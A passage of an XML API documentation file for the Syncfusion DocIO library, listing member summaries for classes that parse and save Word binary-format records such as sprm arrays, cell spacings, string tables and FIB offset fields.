        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsValidSectionPropertySprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Checks for valid Section Property sprm
            </summary>
            <param name="sprm"></param>
            <returns>
            <c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsValidPicturePropertySprm(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Checks for valid Picture Property sprm
            </summary>
            <param name="sprm"></param>
            <returns>
            <c>true</c> if sprm is correct; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Save(System.IO.BinaryWriter,System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <param name="length"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Save(System.IO.BinaryWriter,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Clear">
            <summary>
            Removes all modifiers from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Add(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            Adds new modifier to the collection.
            </summary>
            <param name="modifier">Modifier to add.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SortSprms">
            <summary>
            Sort Sprms based on Unique ID
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsContainTrackChangesSprm">
            <summary>
            Check whether the Sprms contain TrackChanges SPRMs
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.InsertAt(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord,System.Int32)">
            <summary>
            Adds new modifier to the collection.
            </summary>
            <param name="modifier">Modifier to add.</param>
            <param name="index"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.InsertRangeAt(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32)">
            <summary>
            Adds new modifier to the collection.
            </summary>
            <param name="modifiers">Modifier to add.</param>
            <param name="index"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetBoolean(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="defValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetByte(System.Int32,System.Byte)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="defValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.HasSprm(System.Int32)">
            <summary>
            Returns true if sprm present
            </summary>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetUShort(System.Int32,System.UInt16)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="defValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetShort(System.Int32,System.Int16)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="defValue"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetInt(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="icoe"></param>
            <param name="defVal"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetUInt(System.Int32,System.UInt32)">
            <summary>
            
            </summary>
            <param name="icoe"></param>
            <param name="defVal"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetByteArray(System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="flag"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.Byte)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.UInt16)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.Int16)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.UInt32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SetValue(System.Int32,System.Byte[])">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SaveTableDescriptor(Syncfusion.DocIO.ReaderWriter.Biff_Records.TableRowDescriptor)">
            <summary>
            Saves the table descriptor.
            </summary>
            <param name="rowDescr"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Clone">
            <summary>
            Clones this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.CopyTo(System.Array,System.Int32)">
            <summary>
            
            </summary>
            <param name="array"></param>
            <param name="index"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetEnumerator">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetSPRM(System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.GetSprmByIndex(System.Int32)">
            <summary>
            Gets the sprm by index.
            </summary>
            <param name="sprmIndex">Index of the SPRM.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Contain(System.Int32)">
            <summary>
            Contains the specified option.
            </summary>
            <param name="option">The option.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.TryGetSprm(System.Int32)">
            <summary>
            Returns corresponding sprm if it
            </summary>
            <param name="options">Options</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Modifiers">
            <summary>
            List of single property modifiers. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Item(System.Int32)">
            <summary>
            Indexer by sprm options.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Count">
            <summary>
            Returns number of elements in the array. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.IsSynchronized">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SyncRoot">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.m_iIndex">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.m_parent">
            <summary>
            Parent collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            
            </summary>
            <param name="parent"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.Reset">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.MoveNext">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray.SPRMEnumerator.Current">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord">
            <summary>
            Summary description for SprmRecord.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_MASK_UNIQUE_ID">
            <summary>
            0-8 bits.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_START_UNIQUE_ID">
            <summary>
            Start bit for unique id bit mask.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_BIT_SPECIAL_HANDLE">
            <summary>
            Bit index for special handling value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_MASK_SPRM_TYPE">
            <summary>
            Mask for type of sprm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_START_SPRM_TYPE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_MASK_OPERAND_SIZE">
            <summary>
            Mask for operand size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_START_OPERAND_SIZE">
            <summary>
            Start non-zero bit in operand size mask.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DEF_MASK_WORD">
            <summary>
            Mask for ushort value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.m_usOptions">
            <summary>
            Header options of the sprm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.m_iOperandLength">
            <summary>
            Length of the operand.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.m_arrOperand">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.m_length">
            <summary>
            Sprm length.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.#ctor(System.Int32)">
            <summary>
            
            </summary>
            <param name="options"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.#ctor(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Parse(System.Byte[],System.Int32)">
            <summary>
            Extracts SPRM structure from array of bytes.
            </summary>
            <param name="arrBuffer">Array of bytes that contains SPRM.</param>
            <param name="iOffset">Offset of SPRM in the array of bytes.</param>
            <returns>Offset in arrBuffer after SPRM.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Parse(System.IO.Stream)">
            <summary>
            Extracts SPRM structure from stream.
            </summary>
            <param name="stream">Stream with sprm data.</param>
            <param name="converter">MemoryConverter to convert memory block into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Save(System.IO.BinaryWriter,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="writer"></param>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Clone">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.ConvertToInt(Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize)">
            <summary>
            Converts WordSprmOperandSize to number of bytes needed to be read from stream.
            </summary>
            <param name="operandSize">Size of the operand.</param>
            <returns>Number of bytes needed to be read from stream.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.ParseOptions(System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmType@,Syncfusion.DocIO.ReaderWriter.Biff_Records.WordSprmOperandSize@)">
            <summary>
            
            </summary>
            <param name="options"></param>
            <param name="type"></param>
            <param name="opSize"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.DBG_TestParseOptions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.GetSprmLength">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.UniqueID">
            <summary>
            Unique identifier within sgc group.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.IsSpecialHandling">
            <summary>
            Indicates whether sprm needs special handling.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.SprmType">
            <summary>
            Type of sprm.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.OperandSize">
            <summary>
            Size of the operand.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.OperandLength">
            <summary>
            Size of the operand in bytes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Operand">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.BoolValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.ByteValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.UshortValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.ShortValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.IntValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.UIntValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.ByteArray">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.TypedOptions">
            <summary>
            Header options of the sprm.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Options">
            <summary>
            Header options of the sprm.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord.OptionType">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings">
            <summary>
            Summary description for Spacings.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.m_left">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="sprm"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Parse(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierRecord)">
            <summary>
            
            </summary>
            <param name="sprm"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Save(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="modifierArray"></param>
            <param name="options"></param>
            <param name="cellNumber"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Clone">
            <summary>
            Clone cell spacing
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.SaveSingleRecord(System.Byte,System.Int16,System.Int32)">
            <summary>
            
            </summary>
            <param name="type"></param>
            <param name="dist"></param>
            <param name="options"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Left">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Right">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Top">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.Bottom">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.CellNumber">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Spacings.IsEmpty">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord">
            <summary>
            Summary description for StringTableRecord.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="data">Data to parse.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StringTableRecord.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB">
            <summary>
            Summary description for ArrayOfShorts.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs">
            <summary>
            Summary description for ArrayOfLongsBase.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs.DEF_MEMBER_SIZE">
            <summary>
            Size in bytes of each member in this array.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs.m_arrLongs">
            <summary>
            Array of ints.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs.Resize(System.Int32)">
            <summary>
            Resizes array.
            </summary>
            <param name="iNewSize">New size of the array.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs.SetBuffer(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrBuffer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.BaseArrayOfLongs.Save(System.Byte[],System.Int32)">
            <summary>
            Copies array of longs into array of bytes.
            </summary>
            <param name="arrData">Destination array of bytes.</param>
            <param name="iOffset">Offset to the start byte in the destination array to copy into.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
            <returns>Size in bytes of the copied data.</returns>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.DEF_MEMBER_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.DEF_KNOWN_MEMBERS">
            <summary>
            Number of known members.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.DEF_FCLCB_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.knownPart">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.SetBuffer(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrBuffer"></param>
            <param name="provider"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.Save(System.Byte[],System.Int32)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="iOffset"></param>
            <param name="converter"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.BytesCount">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.DEF_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcStshfOrig">
            <summary>
            file offset of original allocation for STSH in table stream. During fast save Word will attempt to reuse this allocation if STSH is small enough to fit.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbStshfOrig">
            <summary>
            count of bytes of original STSH allocation
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcStshf">
            <summary>
            offset of STSH in table stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbStshf">
            <summary>
            count of bytes of current STSH allocation
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffndRef">
            <summary>
            offset in table stream of footnote reference PLCF of FRD structures. CPs in PLC are relative to main document text stream and give location of footnote references.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffndRef">
            <summary>
            count of bytes of footnote reference PLC== 0 if no footnotes defined in document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcffndTxt">
            <summary>
            offset in table stream of footnote text PLC. CPs in PLC are relative to footnote subdocument text stream and give location of beginnings of footnote text for corresponding references recorded in plcffndRef. No structure is stored in this plc. There will just be n+1 FC entries in this PLC when there are n footnotes
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcffndTxt">
            <summary>
            count of bytes of footnote text PLC. == 0 if no footnotes defined in document
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfandRef">
            <summary>
            offset in table stream of annotation reference ATRD PLC. The CPs recorded in this PLC give the offset of annotation references in the main document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfandRef">
            <summary>
            count of bytes of annotation reference PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfandTxt">
            <summary>
            offset in table stream of annotation text PLC. The Cps recorded in this PLC give the offset of the annotation text in the annotation sub document corresponding to the references stored in the plcfandRef. There is a 1 to 1 correspondence between entries recorded in the plcfandTxt and the plcfandRef. No structure is stored in this PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfandTxt">
            <summary>
            count of bytes of the annotation text PLC
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfsed">
            <summary>
            offset in table stream of section descriptor SED PLC. CPs in PLC are relative to main document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcfsed">
            <summary>
            count of bytes of section descriptor PLC.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcpad">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.lcbPlcpad">
            <summary>
            no longer used
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.ArrayOfFCLCB.KnownPart.fcPlcfphe">
            <summary>
            offset in table stream of PHE PLC of paragraph heights. CPs in PLC are relative to main document text stream. Only written for files in complex format. Should not be written by third party creators of Word files.
            </summary>
